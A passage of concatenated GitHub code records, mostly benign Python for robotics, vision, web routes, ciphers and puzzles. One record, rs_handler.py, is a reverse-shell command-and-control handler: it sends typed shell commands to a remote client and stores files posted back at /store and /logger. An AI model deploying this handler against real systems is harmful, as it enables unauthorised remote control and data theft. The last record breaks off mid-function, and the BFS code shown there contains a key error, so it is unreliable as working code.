delta_p)\n q = hamilton_product(qt_1, delta_q)\n initial_pose = np.concatenate((p, q))\n \n final_poses = np.vstack((final_poses, initial_pose[np.newaxis, :]))\n return final_poses\n \n\ndef return_poses(dataset, path):\n check = torch.load(path, map_location=torch.device(\"cpu\"))\n \n data_set = IMUDataset(dataset)\n loader = DataLoader(data_set, 32)\n relative = torch.cat(list(data[\"relative_pose\"] for data in loader), dim=0)\n pose = pd.read_csv(ROOT_DIR + dataset + \"/mav0/state_groundtruth_estimate0/data.csv\").values\n\n initial_pose_true = pose[0, 1:8]\n poses_predicted = check[\"absolute_pose\"][dataset].numpy()\n\n final_poses_true = trajectory_poses(relative.numpy(), initial_pose_true)\n final_poses = trajectory_poses(poses_predicted, initial_pose_true)\n\n return final_poses_true, final_poses","repo_name":"nisharaichur/End-to-End-Learning-Framework-for-IMU-Based-6-DOF-Odometry","sub_path":"util_funs.py","file_name":"util_funs.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"19824763696","text":"from typing import Tuple\n\nfrom configs.config import ApplicationConfig\nfrom context import Context\nfrom transport.sanic import endpoints\n\n\ndef get_routes(config: ApplicationConfig, context: Context) -> Tuple:\n return(\n endpoints.HealthEndpoint(\n config=config, uri='/', methods=['POST', 'GET'], context=context),\n endpoints.CreateUserEndpoint(\n config=config, uri='/user', methods=['POST'], context=context),\n endpoints.AuthUserEndpoint(\n config=config, uri='/auth', methods=['POST'], context=context),\n endpoints.InfoUserEndpoint(\n config=config, uri='/user/', methods=['GET', 'PATCH'], context=context, need_auth=True),\n endpoints.DeleteUserEndpoint(\n config=config, uri='/delete_user/', methods=['DELETE'], context=context, need_auth=True),\n endpoints.MessageEndpoint(\n config=config, uri='/message', methods=['GET', 'POST'], context=context, need_auth=True),\n endpoints.MessageInfoEndpoint(\n config=config, uri='/message/', methods=['GET', 'PATCH', 'DELETE'],\n context=context, need_auth=True),\n )","repo_name":"kostyak127/backendnapoleonit","sub_path":"transport/sanic/endpoints/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20678908701","text":"# H-Index\n\n# 명시된 정의를 이용한 풀이\n# https://programmers.co.kr/learn/courses/30/lessons/42747\n\ndef solution(citations):\n answer=len(citations)\n citations.sort(reverse=True)\n\n for i in range(len(citations)):\n if citations[i]= RECHECK)\n\n if cond1 or cond2:\n\n if check_command(CMD_CHECK) == False:\n started = False\n while not started:\n send_command(CMD_START, bg=True); sleep(1)\n started = check_command(CMD_CHECK)\n send_command(CMD) if DEFAULT else None\n\n tstamp = time()\n started = True\n\n now = GPIO.input(PORT)\n\n if (now != before):\n send_command(CMD); sleep(0.25)\n\n before = now\n sleep(WAIT)\n\n except Exception as e:\n #raise # <-- uncomment line if bug-hunting!\n print(str(e))\n sleep(WAIT)\n\ndef check_command(cmd, bg=False, quiet=False):\n '''\n Checks command output and optionally performs action.\n '''\n output = send_command(cmd, bg=bg)\n\n if isinstance(output, bytes): # Python3\n output = output.decode('utf8', 'ignore')\n\n try: output = int(output) # True or False\n except: output = str(output) # 0==False, 1>=True\n\n cond_false = isinstance(output, str) and output.startswith(\"False\")\n cond_true = isinstance(output, str) and output.startswith(\"True\")\n\n cond0 = isinstance(output, int) and output == 0\n cond1 = isinstance(output, int) and output >= 1\n\n if cond_false or cond0:\n return False\n elif cond_true or cond1:\n return True\n return None\n\ndef send_command(cmd, bg=False):\n '''\n Executes command as a foreground process by default.\n '''\n print(str(int(time()))+' => '+str(cmd))\n return Popen(cmd) if bg else check_output(cmd)\n\nif __name__ == '__main__':\n start_script()","repo_name":"nelsonaloysio/raspi_exec","sub_path":"raspi_exec.py","file_name":"raspi_exec.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17209459610","text":"from bisect import bisect_right\nfrom sys import stdin\nimport math\n\n\ndef main():\n # eratosthenes sieve\n is_prime = [True] * 5000001\n for i in range(2, int(math.sqrt(5000000)) + 1):\n if is_prime[i]:\n for j in range(i * i, 5000001, i):\n is_prime[j] = False\n primes = [i for i in range(1, 5000001) if is_prime[i]]\n\n t = int(stdin.readline())\n for _ in range(t):\n n = int(stdin.readline())\n a = list(map(int, stdin.readline().split()))\n cnt = []\n for ai in a:\n if ai % 2 == 0:\n cnt.append(ai // 2)\n else:\n for i in range(bisect_right(primes, ai) - 1, -1, -1):\n if (ai - primes[i]) % 4 == 0:\n cnt.append(1 + (ai - primes[i]) // 2)\n break\n\n min_cnt = min(cnt)\n if min_cnt % 2 == 1:\n print(\"Farmer John\", flush=False)\n else:\n john = False\n for cnt_i in cnt:\n if cnt_i == min_cnt + 1:\n john = True\n break\n elif cnt_i == min_cnt:\n break\n\n if john:\n print(\"Farmer John\", flush=False)\n else:\n print(\"Farmer Nhoj\", flush=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yonsweng/ps","sub_path":"boj/26973.py","file_name":"26973.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"14651272374","text":"'''\n Author: Jordan Madden\n Usage: python test.py --model=\"ssdmobilenet_v2\"\n python test.py --model=\"efficientdet_d0\" \n'''\n\nfrom playsound import playsound \nfrom threading import Thread\nimport pyrealsense2 as rs\nimport numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\n\n# Suppress TensorFlow logging\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' \n\nimport tensorflow as tf\nfrom object_detection.builders import model_builder\nfrom object_detection.utils import label_map_util, config_util\nfrom object_detection.utils import visualization_utils as viz_utils\n\n# Suppress TensorFlow logging (2)\ntf.get_logger().setLevel('ERROR')\n\nclass RealSenseVideo:\n def __init__(self, width=640, height=480):\n # Frame dimensions of camera\n self.width = width\n self.height = height\n\n # Build and enable the depth and color frames\n self.pipeline = rs.pipeline()\n self.config = rs.config()\n self.config.enable_stream(rs.stream.depth, self.width, self.height, rs.format.z16, 30)\n self.config.enable_stream(rs.stream.color, self.width, self.height, rs.format.bgr8, 30)\n\n # Start streaming\n self.pipeline.start(self.config)\n \n # Read the first frame from the stream\n self.frame = self.pipeline.wait_for_frames()\n self.depth_frame = self.frame.get_depth_frame()\n self.color_frame = self.frame.get_color_frame()\n\n # Variable to check if thread should be stopped\n self.stopped = False\n\n def start(self):\n # Start the thread to read the frames from the video stream\n Thread(target=self.update, args=()).start()\n return self\n\n def update(self):\n while True:\n # Stop streaming in indicator is set\n if self.stopped:\n return\n\n # Otherwise read the next frame in the stream\n self.frame = self.pipeline.wait_for_frames()\n self.depth_frame = self.frame.get_depth_frame()\n self.color_frame = self.frame.get_color_frame()\n if not self.depth_frame or not self.color_frame:\n return\n\n def read(self):\n # Return the most recent color and depth frame\n return self.color_frame, self.depth_frame\n\n def stop(self) :\n # Stop the video stream\n self.stopped = True\n self.pipeline.stop()\n\ndef model_name(model):\n # Return the name of the model that was specified through the command\n # line arguement\n if model == 'ssdmobilenet_v2':\n return 'ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8'\n elif model == 'efficientdet_d0':\n return \"efficientdet_d0_coco17_tpu-32\"\n\ndef path_to_ckpt(model):\n # Return the path to the model that was specified through the command\n # line arguement\n if model == 'ssdmobilenet_v2':\n return os.path.join(MODELS_DIR, os.path.join('ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8', 'checkpoint/'))\n elif model == 'efficientdet_d0':\n return os.path.join(MODELS_DIR, os.path.join('efficientdet_d0_coco17_tpu-32', 'checkpoint/'))\n\ndef path_to_cfg(model):\n # Return the path to the model that was specified through the command\n # line arguement\n if model == 'ssdmobilenet_v2':\n return os.path.join(MODELS_DIR, os.path.join('ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8', 'pipeline.config'))\n elif model == 'efficientdet_d0':\n return os.path.join(MODELS_DIR, os.path.join('efficientdet_d0_coco17_tpu-32', 'pipeline.config')) \n\n@tf.function\ndef detect(img):\n # Preprocess the image and get the bounding box detections for objects \n # in the image\n img, shapes = detector.preprocess(img)\n prediction_dict = detector.predict(img, shapes)\n detections = detector.postprocess(prediction_dict, shapes)\n\n return (detections, prediction_dict, tf.reshape(shapes, [-1]))\n\ndef playback(commnds, motion_command):\n #Play audio recording of the given command\n playsound(commands[motion_command])\n\ndef filter_distance(depth_frame, x, y):\n #List to store the consecutive distance values and randomly initialized variable\n distances = []\n positive = np.random.randint(low=30, high=100)\n\n i = 0\n while(i < 75):\n # Extract the depth value from the camera\n dist = int(depth_frame.get_distance(x, y) * 100)\n \n # Store the last positive value for use in the event that the\n # value returned is 0\n if dist != 0:\n positive = dist\n elif dist == 0:\n positive == positive\n\n # Add the distances to the list\n distances.append(positive)\n i += 1\n\n # Convert the list to a numpy array and return it\n distances = np.asarray(distances)\n return int(distances.mean()) \n\ndef get_object_info(depth_frame, detections, scores, H, W, confidence=0.5):\n # Initialize list to store bounding box coordinates of each bounding box\n # and the distance of each block\n object_info = []\n\n for detection, score in zip(detections, scores):\n # Only move forward if score is above the threshold\n if score > confidence:\n # Extract the coordinates of the detections and normalize each detection\n y1, x1, y2, x2 = detection\n y1 = int(H*y1)\n x1 = int(W*x1)\n y2 = int(H*y2)\n x2 = int(W*x2)\n\n # Get the midpoint of each bounding box\n midX = (x1 + x2)//2\n midY = (y1 + y2)//2\n\n # Find the distance of each point\n distance = filter_distance(depth_frame, midX, midY)\n\n # Add the coordinates to the coordinate list and the \n object_info.append([distance, (x1, y1, x2, y2)])\n\n # Sort the data points by distance\n object_info.sort()\n\n return object_info\n\ndef command(val, frame):\n # Display the command on the screen\n text = \"Command: {}\".format(val)\n cv2.rectangle(frame, (0, 0), (180, 25), (255, 255, 255), -1)\n cv2.putText(frame, text, (10, 20), cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 0, 0), thickness=2)\n\ndef checkpoints(depth_frame):\n global checkpoint_detection\n checkpoint_detection = False\n min_distance2 = 80\n W, H = 640, 480\n\n # Coordinates of the points to be checked in the frame\n center = filter_distance(depth_frame, W//2, H//2)\n right = filter_distance(depth_frame, W//2 + 90, H//2)\n left = filter_distance(depth_frame, W//2 - 90, H//2)\n l_center = filter_distance(depth_frame, W//2, H//2 + 180)\n l_right = filter_distance(depth_frame, W//2 + 60, H//2 + 180)\n l_left = filter_distance(depth_frame, W//2 - 60, H//2 + 180)\n \n # If any of the checkpoints are triggered raise a notification\n if ((center < min_distance2) or (left < min_distance2) or (right < min_distance2) or \n (l_center < min_distance2) or (l_left < min_distance2) or (l_right < min_distance2)):\n checkpoint_detection = True\n return True\n \n return False\n\ndef navigate(frame, depth_frame, dist, left, right):\n def stop_moving(dist, depth_frame):\n # Stop moving if an object is detected within 1.2 meters or if any of the \n # chekpoints are triggered\n if (dist < min_distance):\n return True \n \n # If none of the conditions are met, keep moving\n return False\n\n # Determine the midpoint of each detection and the distance between the object and \n # the left and right borders of the frame\n dist_left = left - 0\n dist_right = 640 - right\n \n if stop_moving(dist, depth_frame):\n # Stop moving for a bit while deciding what action to take\n command(\"Stop\", frame)\n time.sleep(0.5)\n\n if dist_left > dist_right:\n command(\"Left\", frame)\n elif dist_right > dist_left:\n command(\"Right\", frame)\n else:\n # Move forward\n command(\"Forward\", frame)\n\nif __name__ == \"__main__\":\n # Construct and parse the command line arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-m\", \"--model\", required=True,\n help=\"type of model to use\")\n args = vars(ap.parse_args())\n\n # Declare the filepaths and data structures for text \n # to speech\n COMMAND_PATH = 'text_to_speech/commands'\n FWD = 'forward_command.mp3'\n LEFT = 'left_command.mp3'\n RIGHT = 'right_command.mp3'\n STOP = 'stop_command.mp3'\n forwardPath = os.path.join(COMMAND_PATH, FWD)\n leftPath = os.path.join(COMMAND_PATH, LEFT)\n rightPath = os.path.join(COMMAND_PATH, RIGHT)\n stopPath = os.path.join(COMMAND_PATH, STOP)\n\n commands = {}\n commands[\"Forward\"] = forwardPath\n commands[\"Left\"] = leftPath\n commands[\"Right\"] = rightPath\n commands[\"Stop\"] = stopPath\n\n # Declare the relevant constants for object detection\n OD_BASE_PATH = 'object_detection\\\\tf2'\n DATA_DIR = os.path.join(OD_BASE_PATH, 'data')\n MODELS_DIR = os.path.join(DATA_DIR, 'models')\n MODEL_NAME = model_name(args[\"model\"])\n LABEL_FILENAME = 'mscoco_label_map.pbtxt'\n PATH_TO_LABELS = os.path.join(MODELS_DIR, os.path.join(MODEL_NAME, LABEL_FILENAME))\n PATH_TO_CKPT = path_to_ckpt(args[\"model\"])\n PATH_TO_CFG = path_to_cfg(args[\"model\"])\n\n # Declare the relevant constants for the use of the realsense camera\n SCALE_H = 0.5\n SCALE_W = 0.5\n\n # Declare variables and constants for navigation\n checkpoint_detection = False\n min_distance = 120\n \n # Build the object detector, restore its weights from the checkpoint file\n # and load the label map\n print(\"[INFO] building model pipeline and detector...\")\n configs = config_util.get_configs_from_pipeline_file(PATH_TO_CFG)\n model_config = configs['model']\n detector = model_builder.build(model_config=model_config, is_training=False)\n\n print(\"[INFO] restoring model checkpoint...\")\n PATH_TO_RESTORE = os.path.join(PATH_TO_CKPT, 'ckpt-0')\n ckpt = tf.compat.v2.train.Checkpoint(model=detector)\n ckpt.restore(PATH_TO_RESTORE).expect_partial()\n\n category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\n # Start the video stream\n print(\"[INFO] starting video stream...\")\n vs = RealSenseVideo(width=640, height=480).start()\n time.sleep(1)\n\n try:\n while True:\n # Get the video frames from the camera\n color_frame, depth_frame = vs.read() \n\n # Extract the dimensions of the depth frame\n (H, W) = depth_frame.get_height(), depth_frame.get_width()\n\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_frame.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\n # and extract the image dimensions\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n \n # Downsize frame before feeding it into the object detector\n frame = color_image \n color_image = np.expand_dims(color_image, axis=0)\n input_tensor = tf.convert_to_tensor(color_image, dtype=tf.float32)\n\n # Run the object detection and get the results\n (detections, predictions_dict, shapes) = detect(input_tensor)\n\n label_id_offset = 1\n frame = frame.copy()\n\n viz_utils.visualize_boxes_and_labels_on_image_array(\n frame,\n detections['detection_boxes'][0].numpy(), \n (detections['detection_classes'][0].numpy() + label_id_offset).astype(int),\n detections['detection_scores'][0].numpy(),\n category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=200,\n min_score_thresh=.50,\n agnostic_mode=False)\n\n # Convert the detections and their respective scores from numpy arrays to lists\n DETECTIONS = detections['detection_boxes'][0].numpy().tolist()\n SCORES = detections['detection_scores'][0].numpy().tolist()\n points = get_object_info(depth_frame, DETECTIONS, SCORES, H, W)\n print(points)\n time.sleep(2)\n\n for point in points:\n # Extract the bounding box coordinates and distance of each detection\n dist, coords = point\n x1, y1, x2, y2 = coords\n \n # Find the mid-point coordinates\n midX = (x1+x2)//2\n midY = (y1+y2)//2\n\n # Draw a circle at the midpoint for visual validation\n cv2.circle(frame, (midX, midY), radius=5, \n color=(0,0,255), thickness=2) \n\n # Display the distance of each object from the camera\n text = \"Distance: {}cm\".format(dist)\n cv2.putText(frame, text, (midX, midY-20), cv2.FONT_HERSHEY_SIMPLEX, \n 0.5, (0, 0, 255), thickness=2)\n\n # Determine what command to give to the user\n navigate(frame, depth_frame, dist, x1, x2)\n \n if not checkpoint_detection:\n if checkpoints(depth_frame):\n command(\"Stop\", frame)\n time.sleep(0.5)\n else:\n command(\"Forward\", frame)\n\n checkpoint_detection = False\n\n # Display the video frame \n cv2.namedWindow('RealSense')\n cv2.imshow('RealSense', frame)\n\n # End the video stream is the letter \"Q\" is pressed\n key = cv2.waitKey(25) & 0xFF\n if key == ord('q'):\n print(\"[INFO] Ending video stream...\")\n break\n\n # Stop streaming\n vs.stop()\n cv2.destroyAllWindows()\n \n except Exception as e:\n print(\"Problem: {}\".format(e))","repo_name":"neddamj/AINSB","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"74937089493","text":"from http.server import BaseHTTPRequestHandler\nimport cgi\nfrom config import App\n\nclass rs_handler(BaseHTTPRequestHandler):\n\n # Gets user input and send it to client with request headers\n def do_GET(user_input):\n command = input(\"Shell> \")\n user_input.send_response(200)\n user_input.send_header(\"Content-type\", \"text/html\")\n user_input.end_headers()\n user_input.wfile.write(command.encode())\n\n # Gets data from the POST request & prints it out. \n def do_POST(user_input):\n if user_input.path == '/store' or user_input.path == '/logger':\n try:\n # Get the content type headers & check if they're the right type.\n ctype, pdict = cgi.parse_header(user_input.headers.get_content_type())\n if ctype == 'multipart/form-data':\n # Store request in FieldStorage object.\n fs = cgi.FieldStorage(fp = user_input.rfile,\n headers = user_input.headers,\n environ = {'REQUEST_METHOD':'POST'})\n else:\n print('[!] An unexpected error occurred.')\n file_item = fs['file']\n with open(App.config('OUTPUTFILEPATH'), 'wb') as o:\n o.write(file_item.file.read())\n user_input.send_response(200)\n user_input.end_headers()\n\n except Exception as e:\n print(e)\n \n user_input.send_response(200)\n user_input.end_headers()\n request_length = int(user_input.headers['Content-Length'])\n request_data = user_input.rfile.read(request_length)\n print(request_data)\n\n\n\n \n","repo_name":"calpet/http_reverse_shell","sub_path":"src/rs_handler.py","file_name":"rs_handler.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25779280446","text":"import boto3\nfrom datetime import datetime\nfrom botocore.exceptions import ClientError\n\n\ndef execute_glue_api(DATABASE_NAME,TB_NAME,partition_val):\n client = boto3.client('glue',region_name='eu-west-2')\n try:\n client.delete_partition(DatabaseName=DATABASE_NAME,TableName=TB_NAME,PartitionValues=[partition_val])\n except ClientError as e:\n print('partition not exist',e.response['Error']['Code'])\n\ndef lambda_handler(event, context):\n DATABASE_NAME='api_input_notprod'\n TB_NAME='input_file_api'\n partition_val='2019-12-03/12:03:29.036194'\n execute_glue_api(DATABASE_NAME,TB_NAME,partition_val)\n return { 'statusCode': 200 }\n","repo_name":"sidaker/dq","sub_path":"src/lambda_execute_glueapi.py","file_name":"lambda_execute_glueapi.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3114653230","text":"#!/usr/bin/env python\n\n\"\"\"\n Cryptopy Version 2\n Crypte et decrypte un texte en chiffrement Cesar.\n Sait travailler avec le contenu d'un fichier texte.\n\"\"\"\n\n#### Imports\nimport string\n\n#### Constantes\nJEUCAR = string.printable[:-5]\nCARSUBSTI = JEUCAR[-3:]+JEUCAR[:-3]\nMSG_TEST = \"J'adore les Monty Python. Trop cool.\"\n\n# Generation du dictionnaire avec le jeu de caracteres\n# (en clair)\nDICO_ENCRYP = {}\nfor i,k in enumerate(JEUCAR):\n v = CARSUBSTI[i]\n DICO_ENCRYP[k] = v\n# Les autres \\t, \\n etc. restent tels quels\nfor c in string.printable[-5:]:\n DICO_ENCRYP[c] = c\n\n### Fonctions\ndef encrypter(texteclair, vardico_cryp):\n \"\"\"\n Crypte le message texteclair avec le dictionnaire fourni et renvoie le \n texte une fois rendu illisible.\n \"\"\"\n textesecret = []\n for k in texteclair:\n v = vardico_cryp[k]\n textesecret.append(v)\n return ''.join(textesecret)\n\ndef decrypter(textesecret, vardico_decryp):\n \"\"\"\n Decrypte le message avec le dictionnaire fourni et renvoie le \n texte une fois rendu lisible.\n \"\"\"\n texteclair = []\n for k in textesecret:\n v = vardico_decryp[k]\n texteclair.append(v)\n return ''.join(texteclair)\n\n### Main Section\ntextesecret = encrypter(MSG_TEST, DICO_ENCRYP)\nprint(MSG_TEST)\nprint(textesecret)","repo_name":"baliaga31/Python","sub_path":"Python_dummies/Week_03/Projet_07/cryptopy_v03.py","file_name":"cryptopy_v03.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8497684862","text":"import pylab as pyl\nfrom astLib import astStats\nimport h5py as hdf\nfrom matplotlib.ticker import AutoMinorLocator\n\n\ndef calc_err(pred, true):\n return (pred - true) / true\n\n\ngolden_mean = (pyl.sqrt(5.) - 1.0) / 2.0\nf = pyl.figure(figsize=(7 * golden_mean, 7))\n\nax1 = pyl.subplot2grid((3, 1), (0, 0), rowspan=2)\n\n# now for the bottom bits\nax1s = pyl.subplot2grid((3, 1), (2, 0))\n\nax1.set_xticklabels([])\n# add minor ticks to the bottom\nax1s.yaxis.set_minor_locator(AutoMinorLocator())\n\n### Targeted ###\n################\nwith hdf.File('./buzzard_targetedRealistic_comparison_shifty.hdf5', 'r') as f:\n dset = f[f.keys()[0]]\n target = dset['M200c', 'MASS', 'ML_pred_1d', 'ML_pred_2d2', 'ML_pred_3d']\n# filter bad values\nmask = (target['ML_pred_1d'] != 0)\ntarget = target[mask]\n\n# plot one to one lines\nax1.plot([11.5, 15.5], [11.5, 15.5], c='k', zorder=0)\nax1s.axhline(0)\n\n# now for the plotting\n###################\n#### Power Law ####\n###################\n\nc = '#cf4457'\nzo = 0\n\nprint('power law')\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n pyl.log10(target['MASS']),\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1.plot(y_[0], quants[:, 1], '-', c=c, zorder=zo)\n\nif not c == '#e24a33':\n ax1.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.3,\n edgecolor=c)\nerr = calc_err(target['MASS'], target['M200c'])\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n err,\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1s.plot(y_[0], quants[:, 1], '-', c=c, zorder=zo)\n\nif not c == '#e24a33':\n ax1s.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.3,\n edgecolor=c)\n\n##############\n##### 3d #####\n##############\n\nc = '#467821'\nzo = 1\n\nprint('2d2')\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n target['ML_pred_2d2'],\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1.plot(y_[0], quants[:, 1], '--', c=c, zorder=zo)\nif not c == '#e24a33':\n ax1.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.4,\n edgecolor=c)\nerr = calc_err(10**target['ML_pred_2d2'], target['M200c'])\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n err,\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1s.plot(y_[0], quants[:, 1], '--', c=c, zorder=zo)\nif not c == '#e24a33':\n ax1s.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.4,\n edgecolor=c)\n\n### Add Legend ###\n##################\nline1 = pyl.Line2D([], [], ls='-', color='#cf4457')\nline2 = pyl.Line2D([], [], ls='--', color='#467821')\nax1.legend([line1, line2], ['Power Law', '$ML_{\\sigma, Ngal}$'], loc=2)\n\n#### tweak ####\nax1.set_xticks([12, 13, 14, 15])\nax1s.set_xticks([12, 13, 14, 15])\nax1s.set_ylim(-2, 4)\nax1s.set_yticks([-2, 0, 2])\n\nax1.set_ylabel('Log $M_{pred}$')\nax1s.set_ylabel('$\\epsilon$')\nax1s.set_xlabel('Log $M_{200c}$', fontsize=18)\n\n#ax1.text(14, 12.25, 'Power Law', fontsize=18, horizontalalignment='center')\n#ax4.text(14, 12.25, '$ML_{\\sigma, z, Ngal}$', fontsize=18,\n# horizontalalignment='center')\npyl.show()\n","repo_name":"boada/vpCluster","sub_path":"data/boada/analysis_all/MLmethods/plot_massComparison_single.py","file_name":"plot_massComparison_single.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"43886566282","text":"import disnake\r\nfrom disnake.ext import commands\r\n\r\n\r\nclass reply_to_users(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.count = 0\r\n\r\n @commands.Cog.listener()\r\n async def on_message(self, message: disnake.Message):\r\n self.count += 1\r\n messages = await message.channel.history(limit=100).flatten()\r\n\r\n if message.content.startswith('hello'):\r\n await message.channel.send(\"hi\", delete_after=50)\r\n\r\n elif \"!help\" in message.content:\r\n await message.channel.send(\"type --> **/help**\", delete_after=50)\r\n\r\n elif \"!end\" in message.content:\r\n # messages = msg.content\r\n with open(\"ticket.txt\", 'w') as f:\r\n for msg in messages:\r\n ticket_msg = msg.content\r\n f.write(f\"{msg.author}: {ticket_msg}\")\r\n f.write('\\n')\r\n\r\n\r\ndef setup(bot: commands.bot):\r\n bot.add_cog(reply_to_users(bot))\r\n","repo_name":"fancydsDEV/Discord-bot-Tatsuwari-","sub_path":"cogs/event_log/reply_to_user.py","file_name":"reply_to_user.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4194889983","text":"import time\r\n\r\n'''helper methods'''\r\n\r\nfrom collections import deque\r\n\r\nunique = set()\r\ndef display(initial_state):\r\n print(\"-------------\")\r\n print(\"| \" + initial_state[0] + \" | \" + initial_state[1] + \" | \" + initial_state[2] + \" | \")\r\n print(\"-------------\")\r\n print(\"| \" + initial_state[3] + \" | \" + initial_state[4] + \" | \" + initial_state[5] + \" | \")\r\n print(\"-------------\")\r\n print(\"| \" + initial_state[6] + \" | \" + initial_state[7] + \" | \" + initial_state[8] + \" | \")\r\n print(\"-------------\")\r\n\r\n\r\ndef generate_children(state):\r\n list = []\r\n list_states = []\r\n for s in state:\r\n list.append(s)\r\n pos0 = list.index('0')\r\n if pos0 == 0:\r\n list_states.extend([swap(state, 0, 1), swap(state, 0, 3)]) # list[1], list[3]\r\n elif pos0 == 1:\r\n list_states.extend([swap(state, 1, 0), swap(state, 1, 2), swap(state, 1, 4)]) # 0 2 4\r\n elif pos0 == 2:\r\n list_states.extend([swap(state, 2, 1), swap(state, 2, 5)]) # 1 5\r\n elif pos0 == 3:\r\n list_states.extend([swap(state, 3, 0), swap(state, 3, 4), swap(state, 3, 6)]) # 0 4 6\r\n elif pos0 == 4:\r\n list_states.extend([swap(state, 4, 1), swap(state, 4, 3), swap(state, 4, 5), swap(state, 4, 7)]) # 1 3 5 7\r\n elif pos0 == 5:\r\n list_states.extend([swap(state, 5, 2), swap(state, 5, 4), swap(state, 5, 8)]) # 2 4 8\r\n elif pos0 == 6:\r\n list_states.extend([swap(state, 6, 3), swap(state, 6, 7)]) # 3 7\r\n elif pos0 == 7:\r\n list_states.extend([swap(state, 7, 4), swap(state, 7, 6), swap(state, 7, 8)]) # 4 6 8\r\n elif pos0 == 8:\r\n list_states.extend([swap(state, 8, 5), swap(state, 8, 7)]) # 5 7\r\n return list_states\r\n\r\n\r\ndef possible_cases(final_state):\r\n final_set = set()\r\n frontier = deque()\r\n explored = set()\r\n frontier.append(final_state)\r\n while len(frontier) > 0:\r\n n = frontier.popleft()\r\n for a in findNextStates(n):\r\n if a not in explored:\r\n explored.add(a)\r\n frontier.append(a)\r\n if a[0] == '0':\r\n final_set.add(a)\r\n return len(final_set)\r\n\r\n\r\ndef BreadthFirstSearch(initial_state):\r\n frontier = deque()\r\n explored = {}\r\n frontier.append(initial_state)\r\n while len(frontier) > 0:\r\n n = frontier.popleft()\r\n if goalTest(n):\r\n counter = 0\r\n state_checker = n\r\n list = [] #this list will add the path backward, purpose: generate_path\r\n list.append('012345678') #solved case\r\n while state_checker != initial_state:\r\n state_checker = explored[state_checker]\r\n counter += 1 #shortest_path counter\r\n list.append(state_checker)\r\n #list.append(initial_state)\r\n generate_path(list)\r\n return counter\r\n else:\r\n for a in generate_children(n):\r\n if a not in explored.keys(): #if not in explored, map a to n, a is key, n is value\r\n explored[a] = explored[a] + 1\r\n frontier.append(a)\r\n return \"No solution\", explored\r\n\r\n\r\ndef goalTest(state):\r\n if state == \"012345678\":\r\n return True\r\n return False\r\n\r\ndef generate_path(list):\r\n row1 = \"\"\r\n row2 = \"\"\r\n row3 = \"\"\r\n for i in list[::-1]:\r\n for x in range(0, 3):\r\n row1 += i[x]\r\n row1 += \" \"\r\n for x in range(3, 6):\r\n row2 += i[x]\r\n row2 += \" \"\r\n for x in range(6, 9):\r\n row3 += i[x]\r\n row3 += \" \"\r\n\r\n print(row1)\r\n print(row2)\r\n print(row3)\r\n print(\"\\n\")\r\n\r\n\r\ndef findNextStates(state):\r\n list = []\r\n list_states = []\r\n for s in state:\r\n list.append(s)\r\n pos0 = list.index('0')\r\n if pos0 == 0:\r\n list_states.extend([swap(state, 0, 1), swap(state, 0, 3)]) # list[1], list[3]\r\n elif pos0 == 1:\r\n list_states.extend([swap(state, 1, 0), swap(state, 1, 2), swap(state, 1, 4)]) # 0 2 4\r\n elif pos0 == 2:\r\n list_states.extend([swap(state, 2, 1), swap(state, 2, 5)]) # 1 5\r\n elif pos0 == 3:\r\n list_states.extend([swap(state, 3, 0), 